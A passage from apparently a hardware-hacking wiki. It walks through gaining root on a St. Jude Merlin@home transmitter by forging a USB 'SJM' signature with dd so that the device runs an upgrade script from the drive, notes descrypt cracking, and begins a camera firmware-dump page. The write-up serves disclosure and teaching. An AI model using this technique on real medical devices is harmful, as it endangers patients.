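    print(f"?a x7 keyspace: {seven:,} ({hours_to_exhaust(seven, 544.7e6):.1f} h at 544.7 MH/s)")
    print(f"descrypt bound (1..8 chars): {descrypt_keyspace():,}")
```
<br />
The hashcat session above was lucky: the password fell after 0.01% of the seven-character mask. The point of the keyspace figures is that luck is not required; the eight-character DES limit is exhaustible on commodity GPUs, so a descrypt hash in a readable passwd file should be treated as a cleartext password.<br />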
<br />
== Taking Things Further ==<br />
<br />
Let's look at some of the custom hotplug scripts. /etc/hotplug/usb/sjmusb, which hotplug runs as root whenever a USB mass-storage device appears, looks like a good start.<br />
<br />
<pre>#!/bin/bash<br />
#<br />
# Script to mount valid sjm pendrive(s) via hotplug. Hotplug will invoke <br />
# this script only if the attached USB device is a mass-storage device.<br />
# hotplug does this by looking at the device class of the attached usb device<br />
# See /etc/hotplug/usb.usermap. The device class for mass storage devices<br />
# is ______<br />
# <br />
# In a nutshell, the script looks in /proc/scsi/usb-storage* directory to<br />
# find the scsi ID of the attached USB storage device. It then goes on to<br />
# find the device node corresponding to this scsi ID.<br />
# <br />
# version 1.1 - Added USB signature check functionality <br />
#<br />
# For the new cellular adapters - viz mobidata and velocity, ignore the<br />
# mass storage interface reported. Please see comments at the top of<br />
# /etc/hotplug/usb/velocity for details.<br />
#<br />
# - Ashok Iyer (16-Jun-2010)<br />
#<br />
<br />
export PATH=/usr/bin:/usr/local/bin:$PATH<br />
<br />
MOUNT_PATH="/mnt/sjmpendrives"<br />
MOUNT_NUMBER=1<br />
LOG_FILE="/tmp/usbstorage.log"<br />
SGMAP="sg_map"<br />
<br />
<br />
# The functions in this script rely on "echo" to pass information to each<br />
# other. If you need to modify this script, do not use "echo" for debugging.<br />
# Instead use the feedback()/error_exit() functions below. These will log <br />
# information to a log file and do not interfere with information passing <br />
# between functions.<br />
<br />
***snip***<br />
<br />
function check_sign {<br />
local node1=$1"1"<br />
feedback "Checking signature ... "<br />
feedback "node1 = $node1"<br />
dd if=$node1 of=/tmp/.sign bs=1 count=3 skip=501<br />
signature=`cat /tmp/.sign` <br />
<br />
if [ "$signature" = "SJM" ]; then<br />
feedback "Valid pendrive"<br />
echo 0<br />
else<br />
feedback "Invalid pendrive"<br />
echo -1<br />
fi<br />
}<br />
<br />
***snip***<br />
<br />
# We only mount the first partition of a USB storage device. There is no <br />
# requirement to mount multiple partitions. Makes the job easy :-)<br />
function mount_scsi_dev {<br />
local scsi_dev=$1<br />
local mountpt=""<br />
<br />
# check if the first partition of the device is mounted <br />
if ! mount | egrep -q "^$scsi_dev"1"[[:space:]]" <br />
then<br />
mountpt=$(find_unused_mountpt) || error_exit "Failed to find a mount pt"<br />
mkdir -p "$mountpt" || error_exit "Failed to create mount pt $mountpt"<br />
<br />
# FIXME- Ugly hack to detect partitions on USB flash drive<br />
# Possible bug in Kernel and/or devfs. Either use devfs=nomount kernel cmdline<br />
# or fix devfs once and for all.<br />
# There is another problem in devfs that after the USB flash disk is removed<br />
# the corresponding devfs partitions (part1, part2 etc...) still show up. <br />
foobar=`ls -l $scsi_dev | awk '{print $11}'`<br />
dd if=/dev/$foobar of=/dev/null bs=1 count=1 <br />
<br />
# Checking USB signature<br />
ret=`check_sign $scsi_dev` <br />
if [ $ret -eq 0 ]; then<br />
feedback "Valid pendrive"<br />
else<br />
# Tanto: Inform the Exec App to show <br />
# an Invalid Media Error<br />
if [ -p /tmp/remoteInt.pipe ]; then<br />
echo "UsbHotplug InvalidMedia" > /tmp/remoteInt.pipe<br />
error_exit "Invalid pendrive"<br />
else<br />
echo "ERROR: /tmp/remoteInt.pipe does not exist!!!"<br />
fi<br />
fi<br />
<br />
feedback "Mounting $scsi_dev"1" on $mountpt"<br />
mount -t auto $scsi_dev"1" $mountpt<br />
if [ "$?" -eq 0 ]; then<br />
feedback "$scsi_dev"1" is now mounted on $mountpt"<br />
feedback "Launch application specific script" <br />
sh /etc/launch_appln.sh $mountpt<br />
else<br />
feedback "Mount error for $scsi_dev"<br />
fi<br />
else<br />
feedback "Ignoring $scsi_dev - already mounted"<br />
fi<br />
}<br />
<br />
# Find and mount all attached USB storage devices<br />
function mount_all_attached {<br />
local scsiuniqid=""<br />
feedback "Find and mount all attached usb storage devices"<br />
<br />
for scsiuniqid in $(allusb_scsiuniqid)<br />
do<br />
local scsidev="`diskdev_from_uniqid $scsiuniqid`"<br />
if [ "$scsidev" == "UNKNOWN" ]; then<br />
sleep 1<br />
fi<br />
mount_scsi_dev $scsidev<br />
done<br />
}<br />
<br />
***snip***<br />
<br />
<br />
# The remover script will be invoked when the device is removed. This is<br />
# useless in a way because umount will have no effect. The only benefit is<br />
# that the "mount" command will not show stale entries.<br />
<br />
# FIXME - Need to add specialized LOGIC to selectively umount USB flash drive <br />
# which is removed ( unlike umounting all attached USB flash drives )<br />
feedback "REM = $REMOVER"<br />
if [ -f $REMOVER ]; then<br />
echo '/bin/umount /mnt/sjmpendrives/*' >> $REMOVER<br />
else<br />
echo -e '#!/bin/sh\n/bin/umount /mnt/sjmpendrives/*' > $REMOVER<br />
fi<br />
<br />
# Inform the Export data script when pendrive is unplugged.<br />
echo -e '\nps -A | grep export_data \nif [ $? -eq 0 ]; then \n\tif [ -p /tmp/usbDataExport.pipe ]; then \n\t\t echo "Hotplug umount" > /tmp/usbDataExport.pipe \n\tfi\nfi' >> $REMOVER<br />
chmod a+x $REMOVER<br />
<br />
mount_all_attached</pre><br />
<br />
Let's look inside /etc/launch_appln.sh, which sjmusb runs as root after a successful mount. If the drive carries a version.ini, it executes the drive's own etc/init.d/upgrade_script.sh with no further verification; otherwise it runs the data export script.<br />
<br />
<pre>#!/bin/sh<br />
<br />
if [ $# -ne 1 ]; then<br />
echo "usage: ./launch_appln.sh /mnt/pendrive"<br />
exit<br />
fi<br />
<br />
# FIXME <br />
# This script may be invoked by hotplug <br />
# Do not run the script if it is already running <br />
# updater or data export<br />
<br />
mountpt=$1<br />
script_path=/apps/tanto/<br />
<br />
if [ -f $mountpt/version.ini ]; then<br />
# call updater script<br />
echo "Launching updater script"<br />
if [ -f $mountpt/etc/init.d/upgrade_script.sh ]; then<br />
sh $mountpt/etc/init.d/upgrade_script.sh $mountpt > /tmp/debugUpdater.txt 2>&1<br />
umount /mnt/sjmpendrives/1<br />
umount /mnt/pendrive<br />
else<br />
umount /mnt/sjmpendrives/1<br />
umount /mnt/pendrive<br />
exit 0<br />
fi<br />
else<br />
# Call Data export script<br />
echo "Launching export data script"<br />
sh $script_path/export_data.sh $mountpt<br />
umount /mnt/sjmpendrives/1<br />
umount /mnt/pendrive<br />
fi</pre><br />
<br />
The pendrive "signature" is just the three bytes "SJM" at offset 501 of the first partition, so it is trivial to forge with dd. A freshly formatted drive reads back zeros there:<br />
<br />
<pre>rjmendez@Reggie:~/stjude_merlin$ sudo dd if=/dev/sdb1 of=/tmp/.sign bs=1 count=3 skip=501<br />
3+0 records in<br />
3+0 records out<br />
3 bytes copied, 0.00116472 s, 2.6 kB/s<br />
rjmendez@Reggie:~/stjude_merlin$ hd /tmp/.sign <br />
00000000 00 00 00 |...|<br />
00000003<br />
rjmendez@Reggie:~/stjude_merlin$ hd .sign_mod<br />
00000000 53 4a 4d |SJM|<br />
00000003<br />
rjmendez@Reggie:~/stjude_merlin$ sudo dd if=.sign_mod bs=1 count=3 of=/dev/sdb1 bs=1 seek=501<br />
3+0 records in<br />
3+0 records out<br />
3 bytes copied, 0.00700994 s, 0.4 kB/s<br />
rjmendez@Reggie:~/stjude_merlin$ sudo dd if=/dev/sdb1 of=/tmp/.sign bs=1 count=3 skip=501<br />
3+0 records in<br />
3+0 records out<br />
3 bytes copied, 0.00123249 s, 2.4 kB/s<br />
rjmendez@Reggie:~/stjude_merlin$ hd /tmp/.sign <br />
00000000 53 4a 4d |SJM|<br />
00000003</pre><br />
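<br />
The two scripts together form the whole attack surface: sjmusb's check_sign accepts any partition whose bytes 501-503 read "SJM", and launch_appln.sh then runs etc/init.d/upgrade_script.sh from the drive as root whenever version.ini is present. The following is an added example, not code from this page or from St. Jude Medical. It reproduces the device's check and the dd forgery against a disk-image file rather than a block device, so it runs offline, and contrasts it with what a real update check needs. The HMAC key, the detached-tag scheme and the blank image are constructed for illustration; HMAC is used only because it is in the standard library, and a deployed design would use an asymmetric signature so that a root shell on one transmitter does not yield the key that signs updates for all of them.<br />
<br />
```python
"""Reproduce and forge the Merlin@home pendrive "signature", then show a
stronger check. Added example, not code from the page or from St. Jude
Medical; it operates on an image file instead of /dev/sdX1.
"""
import hashlib
import hmac
import os
import tempfile

SIG_OFFSET = 501      # from check_sign: dd if=$node1 bs=1 count=3 skip=501
SIG_MAGIC = b"SJM"
SECTOR = 512


def read_signature(image: str) -> bytes:
    with open(image, "rb") as f:
        f.seek(SIG_OFFSET)
        return f.read(len(SIG_MAGIC))


def device_accepts(image: str) -> bool:
    """Exactly what the hotplug script checks: 3 fixed bytes, no key, no hash."""
    return read_signature(image) == SIG_MAGIC


def forge_signature(image: str) -> None:
    """Equivalent of: dd if=.sign_mod of=/dev/sdX1 bs=1 count=3 seek=501.
    On a FAT volume bytes 501..503 lie in the boot sector's code area, after
    the BPB and before the 0x55AA marker at 510, so nothing the filesystem
    relies on is disturbed."""
    with open(image, "r+b") as f:
        f.seek(SIG_OFFSET)
        f.write(SIG_MAGIC)


# --- what a real check would need (assumed design, for illustration) -------

def sign_update(script: bytes, key: bytes) -> bytes:
    """Detached tag over the exact bytes the device will execute."""
    return hmac.new(key, script, hashlib.sha256).digest()


def verify_update(script: bytes, tag: bytes, key: bytes) -> bool:
    return hmac.compare_digest(sign_update(script, key), tag)


def make_blank_image(path: str, sectors: int = 4) -> None:
    """Constructed stand-in for a freshly formatted partition: zeros plus the
    0x55AA boot-sector marker, matching the 00 00 00 read at offset 501 above."""
    buf = bytearray(SECTOR * sectors)
    buf[510:512] = b"\x55\xaa"
    with open(path, "wb") as f:
        f.write(buf)


def demo() -> dict:
    fd, path = tempfile.mkstemp(suffix=".img")
    os.close(fd)
    try:
        make_blank_image(path)
        before = device_accepts(path)
        forge_signature(path)
        after = device_accepts(path)
        with open(path, "rb") as f:
            marker = f.read()[510:512]
        # Constructed key and payload; the payload mirrors the page's upgrade_script.sh.
        key = b"constructed-demo-key"
        script = b"#!/bin/sh\necho 'This worked!' > /root/diditwork.txt\n"
        tag = sign_update(script, key)
        return {
            "accepted_before_forge": before,
            "accepted_after_forge": after,
            "boot_marker_intact": marker == b"\x55\xaa",
            "genuine_update_verifies": verify_update(script, tag, key),
            "tampered_update_verifies": verify_update(script + b"reboot\n", tag, key),
        }
    finally:
        os.remove(path)


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```
<br />
Run it as-is and the blank image is rejected, the three-byte write flips it to accepted, and the boot-sector marker survives, which is why the forged Lexar drive above still mounts with -t auto. The last two results show the difference a keyed check makes: the same script verifies, and a one-line change to it does not, independent of any magic bytes on the media.<br />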
<br />
Now add the files launch_appln.sh looks for: a version.ini so it takes the updater branch, and an etc/init.d/upgrade_script.sh of our own.<br />
<br />
<pre>rjmendez@Reggie:/media/rjmendez/7A3B-B3C6$ ls -lahR<br />
.:<br />
total 36K<br />
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 14 11:04 .<br />
drwxr-x---+ 8 root root 4.0K May 14 11:02 ..<br />
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 13 14:02 etc<br />
-rw-r--r-- 1 rjmendez rjmendez 620 May 14 06:01 passwd<br />
-rw-r--r-- 1 rjmendez rjmendez 4 May 10 17:07 version.ini<br />
<br />
./etc:<br />
total 24K<br />
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 13 14:02 .<br />
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 14 11:04 ..<br />
drwxr-xr-x 2 rjmendez rjmendez 8.0K May 13 14:02 init.d<br />
<br />
./etc/init.d:<br />
total 24K<br />
drwxr-xr-x 2 rjmendez rjmendez 8.0K May 13 14:02 .<br />
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 13 14:02 ..<br />
-rw-r--r-- 1 rjmendez rjmendez 771 May 13 18:27 upgrade_script.sh<br />
<br />
rjmendez@Reggie:/media/rjmendez/7A3B-B3C6$ cat etc/init.d/upgrade_script.sh <br />
#!/bin/sh<br />
function led_off {<br />
for i in `seq 0 7`;<br />
do<br />
ledControl -l$i -b0<br />
sleep 0.05<br />
done<br />
}<br />
<br />
function led_dim {<br />
for i in `seq 0 7`;<br />
do<br />
ledControl -l$i -b1<br />
sleep 0.05<br />
done<br />
}<br />
<br />
function led_bright {<br />
for i in `seq 0 7`;<br />
do<br />
ledControl -l$i -b2<br />
sleep 0.05<br />
done<br />
}<br />
<br />
function party_mode {<br />
counter=0<br />
while [ $counter -lt $1 ];<br />
do<br />
led_off<br />
sleep 0.05<br />
led_dim<br />
sleep 0.05<br />
led_bright<br />
sleep 0.05<br />
let counter=counter+1<br />
done<br />
}<br />
<br />
/etc/init.d/tantoapp stop<br />
#cp /mnt/sjmpendrives/1/passwd /etc/passwd<br />
echo "This worked!" > /root/diditwork.txt<br />
if [ -f /root/diditwork.txt ];<br />
then<br />
party_mode 15<br />
else<br />
echo "It did not work..."<br />
fi</pre><br />
<br />
This is the output that we get from the console.<br />
<br />
<pre>operator@(none):~$ su root<br />
Password: <br />
PAM_unix[265]: (su) session opened for user root by (uid=12)<br />
root@(none):~# hub.c: new USB device usb-mx2hci-2, assigned address 2<br />
scsi0 : SCSI emulation for USB Mass Storage devices<br />
Vendor: Lexar Model: USB Flash Drive Rev: 1100<br />
Type: Direct-Access ANSI SCSI revision: 02<br />
Attached scsi removable disk sda at scsi0, channel 0, id 0, lun 0<br />
SCSI device sda: 31285248 512-byte hdwr sectors (16018 MB)<br />
sda: Write Protect is off<br />
Partition check:<br />
/dev/scsi/host0/bus0/target0/lun0: p1<br />
modprobe: Can't locate module /dev/sg1<br />
modprobe: Can't locate module /dev/sg2<br />
modprobe: Can't locate module /dev/sg3<br />
modprobe: Can't locate module /dev/sg4<br />
modprobe: Can't locate module /dev/sg5<br />
modprobe: Can't locate module /dev/sdb<br />
modprobe: Can't locate module /dev/sdc<br />
modprobe: Can't locate module /dev/sdd<br />
modprobe: Can't locate module /dev/sde<br />
modprobe: Can't locate module /dev/sdf<br />
modprobe: modprobe: Can't locate module nls_cp437<br />
modprobe: modprobe: Can't locate module nls_iso8859-1<br />
modprobe: modprobe: Can't locate module nls_iso8859-1<br />
modprobe: modprobe: Can't locate module nls_iso8859-1<br />
ls /root<br />
devel_install.sh diditwork.txt setdev.sh setlog.sh<br />
root@(none):~# cat /root/diditwork.txt <br />
This worked!<br />
root@(none):~# cat /tmp/usbstorage.log <br />
+++ Starting USB (un)mounter script for device /proc/bus/usb/001/002<br />
REM = /var/run/usb/%proc%bus%usb%001%002<br />
Find and mount all attached usb storage devices<br />
usb proc-fs yields SCSI host number=0 - suffix with zeroes (kernel 2.4)<br />
Use sgmap to match 0:0:0:0.<br />
Waiting for device id to appear...<br />
SCSI disk for 0:0:0:0 is /dev/sda<br />
Checking /mnt/sjmpendrives/1<br />
Mountpoint /mnt/sjmpendrives/1 is free<br />
Checking signature ... <br />
node1 = /dev/sda1<br />
Valid pendrive<br />
Valid pendrive<br />
Mounting /dev/sda1 on /mnt/sjmpendrives/1<br />
/dev/sda1 is now mounted on /mnt/sjmpendrives/1<br />
Launch application specific script</pre><br />
<br />
== Party Mode Demo ==<br />
{{#ev:youtube|cNcGebu8NRs}}</div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Merlin-antenna2.jpg&diff=2700File:Merlin-antenna2.jpg2017-05-14T19:05:50Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Merlin-antenna1.jpg&diff=2699File:Merlin-antenna1.jpg2017-05-14T19:05:22Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Merlin-side_usb.jpg&diff=2698File:Merlin-side usb.jpg2017-05-14T19:04:28Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Merlin-back.jpg&diff=2697File:Merlin-back.jpg2017-05-14T19:03:49Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Merlin-front.jpg&diff=2696File:Merlin-front.jpg2017-05-14T19:03:03Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Merlin-uart.jpg&diff=2695File:Merlin-uart.jpg2017-05-14T19:02:03Z<p>Rjmendez: Rjmendez uploaded a new version of &quot;File:Merlin-uart.jpg&quot;</p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Merlin-uart2.jpg&diff=2694File:Merlin-uart2.jpg2017-05-14T19:00:28Z<p>Rjmendez: Rjmendez uploaded a new version of &quot;File:Merlin-uart2.jpg&quot;</p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Merlin-uart2.jpg&diff=2693File:Merlin-uart2.jpg2017-05-14T18:55:48Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Merlin-uart.jpg&diff=2692File:Merlin-uart.jpg2017-05-14T18:39:59Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Merlin-at-home-1.jpg&diff=2691File:Merlin-at-home-1.jpg2017-05-14T18:35:19Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=LeFun_Cloud_IPCam&diff=2683LeFun Cloud IPCam2017-04-21T02:06:50Z<p>Rjmendez: Created page with "__FORCETOC__ {{Disclaimer}} thumb Category:Cameras This page will be dedicated to a general overview, descriptions, and informatio..."</p>
<hr />
<div>__FORCETOC__<br />
{{Disclaimer}}<br />
[[File:Cloudipcam_store.png|100px|left|thumb]]<br />
[[Category:Cameras]]<br />
This page will be dedicated to a general overview, descriptions, and information related to the LeFun C1 wireless surveillance camera.<br />
<br />
== About ==<br />
The LeFun C1 wireless surveillance camera is a network (Wi-Fi/Ethernet) camera with IR LEDs provided by LeFun and available on Amazon.com.<br />
<br />
<gallery><br />
File:Cloudipcam_front.jpg<br />
File:Cloudipcam_profile.jpg<br />
File:Cloudipcam_back.jpg<br />
</gallery><br />
<br />
== Disassembly ==<br />
The base of the camera is attached with four small Phillips screws hidden under the silicone rubber feet. Remove all four and the base comes off, exposing the board.<br />
<br />
<gallery><br />
File:Cloudipcam_bottom.jpg<br />
File:Cloudipcam_board.jpg<br />
</gallery><br />
<br />
== UART ==<br />
A login console is presented on the UART (3.3 V) at 38400 baud. The UART pinout is shown below.<br />
<br />
<gallery><br />
File:Cloudipcam_UART_pins.jpg<br />
</gallery><br />
<br />
== Exploitation ==<br />
<br />
U-Boot is reachable at boot and could probably be used to hijack init; thankfully there is a better option that does not require access to the internals.<br />
<br />
[[File:Cloudipcam_mxic25l12835f.jpg|100px|thumb]]<br />
<br />
The firmware for this model was not available for download anywhere else, and I didn't feel like waiting for it to come over the UART at 38.4k baud, so we resort to hot air and a minipro TL866CS. The SPI flash (MXIC 25L12835F) was removed and dumped; the issue I had was that from 0x0 to 0xC00000 the bytes were reversed within every 4-byte word.<br />
<br />
'''Firmware Format'''<br />
<br />
Raw data from the chip has an interesting pattern to it.<br />
<br />
From U-Boot<br />
<br />
<pre>=> md.b 0x02000000 130<br />
02000000: 47 4d 38 31 32 36 00 00 00 00 01 00 00 00 01 00 GM8126..........<br />
02000010: 00 00 0b 00 00 00 0d 00 00 00 00 00 00 00 00 00 ................<br />
02000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
02000030: 00 00 00 00 08 00 00 00 0c 00 00 00 18 00 00 00 ................<br />
02000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
02000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
02000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
02000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
02000080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
02000090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
020000a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
020000b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
020000c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
020000d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
020000e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
020000f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 aa ..............U.<br />
02000100: fa f8 bb f0 ba ba e7 70 5a be 03 aa 0a ea ae ba .......pZ.......<br />
02000110: 22 f3 7a ff ba 2d 08 aa f7 aa 2a 3c fa bb aa 9e ".z..-....*<....<br />
02000120: 80 2e ea fd b9 ea c2 b5 ec ab 6a ba 8f aa ba ab ..........j.....</pre><br />
<br />
Dumped from the chip.<br />
<br />
<pre>rjmendez@Reggie:~/cloudipcamera$ hd cloudipcamera_mxic25l12835f.BIN | head -n 15<br />
00000000 31 38 4d 47 00 00 36 32 00 01 00 00 00 01 00 00 |18MG..62........|<br />
00000010 00 0b 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 |................|<br />
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|<br />
00000030 00 00 00 00 00 00 00 08 00 00 00 0c 00 00 00 18 |................|<br />
00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|<br />
*<br />
000000f0 00 00 00 00 00 00 00 00 00 00 00 00 aa 55 00 00 |.............U..|<br />
00000100 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................|<br />
*<br />
00001000 80 5a 47 4d 00 00 00 00 00 00 29 18 00 00 00 00 |.ZGM......).....|<br />
00001010 6f 62 73 6e 62 2e 74 6f 00 00 6e 69 00 00 00 00 |obsnb.to..ni....|<br />
00001020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|<br />
*<br />
00001100 ea 00 00 0e e5 9f f0 14 e5 9f f0 14 e5 9f f0 14 |................|<br />
00001110 e5 9f f0 14 e1 a0 00 00 e5 9f f0 10 e5 9f f0 10 |................|</pre><br />
<br />
Let's reorder the bytes.<br />
<br />
<pre>objcopy -I binary -O binary --reverse-bytes=4 cloudipcamera_mxic25l12835f.BIN cloudipcamera_mxic25l12835f.BIN.swapped</pre><br />
<br />
Merging the two halves together (the byte-reversed first 0xC00000 bytes followed by the untouched remainder) gives us the entire image.<br />
<br />
<pre>rjmendez@Reggie:~/cloudipcamera$ binwalk cloudipcamera_mxic25l12835f.BIN.merged <br />
<br />
DECIMAL HEXADECIMAL DESCRIPTION<br />
--------------------------------------------------------------------------------<br />
809008 0xC5830 CRC32 polynomial table, little endian<br />
852224 0xD0100 Linux kernel ARM boot executable zImage (little-endian)<br />
865293 0xD340D gzip compressed data, maximum compression, from Unix, last modified: 2015-10-23 07:16:16<br />
12582912 0xC00000 JFFS2 filesystem, little endian</pre><br />
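<br />
The reorder-and-merge step described above, as an added Python example (not the author's tooling; the page used objcopy --reverse-bytes=4 and a manual merge). It assumes what the page shows: bytes are reversed within each 4-byte word from 0x0 up to 0xC00000, the JFFS2 partition starting at 0xC00000 is already in order, and the rebuilt image should begin with the GM8126 header seen from U-Boot. The sample bytes are the first 16 bytes of the chip dump as printed above.<br />
<br />
```python
"""Undo the 4-byte word reversal in the first 0xC00000 bytes of the SPI dump.

Added example, not the author's tooling. Region boundary and header magic come
from the page: the JFFS2 partition starts at 0xC00000 and is already in order,
and U-Boot shows the image header beginning with the ASCII string GM8126.
"""
import array
import sys

SWAP_REGION_END = 0xC00000   # start of the JFFS2 partition (binwalk output on the page)
WORD_SIZE = 4                # bytes are reversed inside each 4-byte word
HEADER_MAGIC = b"GM8126"     # first bytes of the header as seen from U-Boot

# Constructed sample: the first 16 bytes of the raw chip dump as printed on the page.
RAW_SAMPLE = bytes.fromhex("31384d47000036320001000000010000")


def reverse_words(data: bytes) -> bytes:
    """Reverse the byte order inside every 4-byte word (a 32-bit endianness swap)."""
    if len(data) % WORD_SIZE:
        raise ValueError("length %d is not a multiple of %d" % (len(data), WORD_SIZE))
    words = array.array("I")
    if words.itemsize != WORD_SIZE:
        # Fall back to slicing on platforms where 'I' is not 4 bytes wide.
        return b"".join(data[i:i + WORD_SIZE][::-1]
                        for i in range(0, len(data), WORD_SIZE))
    words.frombytes(data)
    words.byteswap()
    return words.tobytes()


def merge_image(raw: bytes, swap_end: int = SWAP_REGION_END) -> bytes:
    """Rebuild the flash image: fix the swapped head, keep the tail exactly as dumped."""
    head, tail = raw[:swap_end], raw[swap_end:]
    return reverse_words(head) + tail


def header_magic_ok(image: bytes) -> bool:
    """True when the image starts with the header magic U-Boot displays."""
    return image.startswith(HEADER_MAGIC)


def main(argv):
    if len(argv) != 3:
        print("usage: %s <raw_dump.BIN> <merged_out.BIN>" % argv[0])
        return 2
    with open(argv[1], "rb") as f:
        raw = f.read()
    merged = merge_image(raw)
    if not header_magic_ok(merged):
        print("warning: merged image does not start with %r; check the swap region"
              % HEADER_MAGIC)
    with open(argv[2], "wb") as f:
        f.write(merged)
    print("wrote %d bytes" % len(merged))
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```
<br />
The header check is the cheap sanity test a practitioner wants before feeding the result to binwalk: if the swap boundary or word size is wrong, the magic will not line up and the script says so instead of silently writing garbage.<br />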
<br />
'''Filesystem'''<br />
<br />
The notable data includes the root filesystem.<br />
<br />
<pre>rjmendez@Reggie:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ ls<br />
D340D D8B3E4 D8BA40 D8BF44 D8CE50 DC11AC DC15E4 DC1AF4 E7C814 E7CC44 ED5158 ED565C ED5BAC FB50C0 FFE67C jffs2-root-1 jffs2-root-3 jffs2-root-8<br />
_D340D.extracted D8B514 D8BC0C D8C670 D8CEFC DC12AC DC16E8 DC1BC0 E7C90C E7CD44 ED5324 ED5754 ED5CD8 FB51EC FFEAB0 jffs2-root-10 jffs2-root-4 jffs2-root-9<br />
D8B0BC D8B640 D8BD04 D8CBC4 D8D4E8 DC1340 DC180C E7C050 E7CA0C E7CE48 ED541C ED5854 ED5D64 FB5278 FFEDFC jffs2-root-11 jffs2-root-5<br />
D8B1BC D8B6CC D8BE04 D8CCBC D8E460 DC13EC DC193C E7C198 E7CAA0 E7CF6C ED551C ED5958 ED5E30 FB5344 jffs2-root jffs2-root-12 jffs2-root-6<br />
D8B2C0 D8B938 D8BE98 D8CDBC DC10B4 DC14E4 DC1A68 E7C5B0 E7CB4C ED5050 ED55B0 ED5A7C ED5F38 FFE230 jffs2-root-0 jffs2-root-2 jffs2-root-7<br />
rjmendez@Reggie:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ ls _D340D.extracted/<br />
1A100 _1A100.extracted 9FD828<br />
rjmendez@Reggie:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ ls _D340D.extracted/_1A100.extracted/<br />
168.cpio cpio-root<br />
rjmendez@Reggie:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ ls _D340D.extracted/_1A100.extracted/cpio-root/<br />
bin dev etc init lib mnt proc project root sbin sys tmp usr var<br />
rjmendez@Reggie:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ ls _D340D.extracted/_1A100.extracted/cpio-root/root/<br />
welcome.txt<br />
rjmendez@Reggie:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ cat _D340D.extracted/_1A100.extracted/cpio-root/root/welcome.txt <br />
welcome to (c)shenzhen mining mipc world!<br />
enjoy it!</pre><br />
<br />
And the config storage.<br />
<br />
<pre>rjmendez@Reggie:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ ls jffs2-root/fs_1/ -R<br />
jffs2-root/fs_1/:<br />
dev_data ipc_data latest_dhcp_ip_eth0 system_data<br />
<br />
jffs2-root/fs_1/dev_data:<br />
system_config<br />
<br />
jffs2-root/fs_1/ipc_data:<br />
8188eu_ap_2G.conf aec_amr.xml ao0.xml buildinfo.xml io_alert.xml motion_alert.xml ntp_info.xml ptz0.xml RT2870AP.dat vec_half.xml vs0.xml<br />
action_conf.xml aec_g711.xml aoc0.xml data_version ipc_conf.xml motion_ex_alert.xml osd_show_time.xml ptz.xml RT2870STA_adhoc.dat vec_hd.xml vsc0.xml<br />
active_server.xml aec_g726.xml ap.conf default_gw.xml license.xml net_info.sh pass.mp ra0.xml RT2870STA_infra.dat vec_jpeg.xml<br />
aec_aac.xml alarm.xml as0.xml dps localtime net_info.xml pass.up recording_root.xml sd_conf.xml vec_min.xml<br />
aec_adpcm.xml alert_device_conf.xml asc3.xml eth0.xml mediainfo.xml nick_conf.xml proxy.xml recording_task.xml server.xml vec_normal.xml<br />
<br />
jffs2-root/fs_1/ipc_data/dps:<br />
cacs<br />
<br />
jffs2-root/fs_1/ipc_data/dps/cacs:<br />
61646d696e02<br />
<br />
jffs2-root/fs_1/system_data:</pre><br />
<br />
There's also an archive in /project on the root filesystem.<br />
<br />
